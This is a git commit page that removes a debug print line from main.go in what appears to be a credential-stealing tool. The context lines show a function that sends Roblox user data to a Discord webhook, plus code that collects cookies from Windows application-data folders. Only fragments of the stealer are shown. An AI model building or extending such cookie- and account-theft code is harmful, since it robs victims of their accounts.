Browse Source

Remove debug line

master
scxr 1 year ago
parent
commit
9a6e7395bb
1 changed files with 0 additions and 1 deletions
  1. +0
    -1
      main.go

+ 0
- 1
main.go View File

@@ -281,7 +281,6 @@ func createRobloxDiscordWh(data R.UserInfo) {
}

func main() {
fmt.Println(webhook_id)
allCookies := []Cookies{}
roaming := os.Getenv("APPDATA")
local := os.Getenv("LOCALAPPDATA")


Loading…
Cancel
Save